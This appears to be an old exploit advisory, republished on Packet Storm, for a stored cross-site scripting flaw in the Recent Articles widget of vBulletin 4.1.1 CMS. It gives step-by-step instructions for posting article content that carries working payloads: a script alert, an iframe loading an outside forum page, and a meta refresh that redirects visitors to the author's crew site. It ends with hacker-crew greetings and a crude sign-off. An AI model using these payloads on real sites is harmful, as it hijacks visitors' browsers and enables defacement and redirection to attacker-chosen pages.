vBulletin CMS version 4.1.1 with the Recent Articles widget suffers from a cross site scripting vulnerability.
72f350a6e733b48455ad3965cc1b997ae594ecfa7d27995664b27d8e3ec8d8a8============================================================
vBulletin 4 CMS Recent Articles widget XSS Vulnerability
============================================================
#~ Title : vBulletin 4 CMS Recent Articles widget XSS Vulnerability
#~ Software : http://www.vbulletin.com
#~ Tested on : version 4.1.1
#~ Date : 30/06/2011
#~ Discovered by : X-h4ck
#~ Site : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email : mem001@live.com
#~ Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon
@ vBulletin 4 CMS Package..
~ You'll need to create a new article at The Front Page.
# Article Title : NONE
# Article Content : "><script>alert('XSS');</script> , or some other cheats :
"><iframe SRC="http://www.pirate.al/forum/forum.php" height = ?100%? width =?100%?>
">"">><meta http-equiv="Refresh" content="0;url=http://www.pirate.al/">"">
Now Post the Article & check the Front Page ( HOME ) (http://localhost/vbulletin/content.php) , and you will get an " xss " alert , enjoy .
Video : http://www.youtube.com/watch?v=seuT92R6j-Y
+++++++++++++++++++++++++++++++++++++++++++++
# // Aint no pussy made where we came from \\
+++++++++++++++++++++++++++++++++++++++++++++
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed